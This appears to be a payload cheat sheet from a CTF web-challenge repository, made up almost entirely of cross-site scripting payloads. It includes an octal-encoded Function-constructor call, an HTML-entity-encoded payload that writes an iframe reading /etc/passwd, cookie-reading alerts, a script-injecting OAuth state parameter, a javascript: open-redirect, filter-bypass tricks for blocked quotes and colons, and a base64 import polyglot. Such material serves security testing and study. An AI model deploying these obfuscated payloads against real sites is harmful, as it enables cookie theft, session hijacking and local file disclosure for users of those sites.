https://github.com/memzer0x/CTF-Challenges/tree/6fb8b6ed38ac47fec3c46425e531b433e48980e6/CTF-WEB/xssChallenge

(()=>{})["\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162"]("\\141\\154\\145\\162\\164()")()

XSS to LFI payload:

<img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

<iframe srcdoc="<script>alert('XSS')</script>"></iframe>

"%3e%3cImG%20sRC=X%20OneRRoR=alert(document.cookie)%20"%3c

OAuth:

&state=eyJhY3Rpb24iOiJtb2JpbGUiLCJyZWRpcmVjdF90byI6InRlc3RcIj48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4ifQ==

https://████/logout_redirect.do?sysparm_url=//j\\\\javascript%3Aalert(document.domain)

mass inject payload - https://bugbounty.zip/RapidHand.html

https://hackenproof.com/reports/DEE-70

https://hackenproof.com/reports/DEE-68

https://blog.pksecurity.io/2023/10/04/microsoft-office.html

javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

  1. bypass block of single quote ('): ?url=home%26apos;-alert(1)// -> onclick="location='/home'-alert(1)//'"
  2. bypass block of colon (:): ?url=javascript%26colon;alert(1) -> href="javascript:alert(1)"

</base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src><script>
